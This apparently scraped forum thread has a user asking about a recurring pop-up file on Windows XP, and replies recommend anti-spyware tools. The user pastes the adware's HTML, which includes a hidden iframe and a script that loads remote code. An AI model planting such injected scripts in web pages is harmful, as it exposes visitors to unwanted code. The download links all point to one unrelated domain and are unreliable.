Hi,

I only got my brand new computer this morning and started it all up. Shortly
after i was getting pop ups asking for me to cAall lines for diploias and so
on.

I had a little search on the internet and found out how to get rid of them
and thats what i have done. I then istalled loads of updates for Windoiws XP
and turned the firewall on.

However, i now keep getting this one pop up that gives the location of:

C:\Documents and Settings\Daniel\staff.html

and daniel being my, the user. I keep getting the same one all the time and
its only when i am conected to the net. So far i have got 3 just writing
this. The html forthe page is as follows:

<html>
<title> .:[ y E a K u K z ]:. </title>
<center>
<body>
<iframe id="content" style="position:absolute; visibility:hidden;"></iframe>
<script language="JavaScript"
src=" http://www.yqcomputer.com/ "></script>
<script language="JavaScript">
mtrslib_uid = '2294';
mtrslib_retry = 1;
mt_set_onload();
</script>
</body>
</center>
</html>

I deleate the staff.html file and it just comes back again!! Any ideas on
what this is and how to get rid of it??

Thanks in advance for any help.

Daniel

This is caused by a third-party program (adware, spyware,
parasite)

Download, install, *update* and run these two programs:
Ad-aware from http://www.yqcomputer.com/
Spybot from http://www.yqcomputer.com/ (Remove items
listed in red.)

XP
and
visibility:hidden;"></iframe>

Hi Daniel,

I have XP also, and have come to the unfortunate conclusion that you cannot
get rid of pop-ups altogether. The first best way I found to tame the beast
was to install my software firewall, which it seems you have already done.
After that, get your free copy of lavasoft's Ad-aware and run it
regularly -- although one wouldnt think so, that seems to make a big
difference.
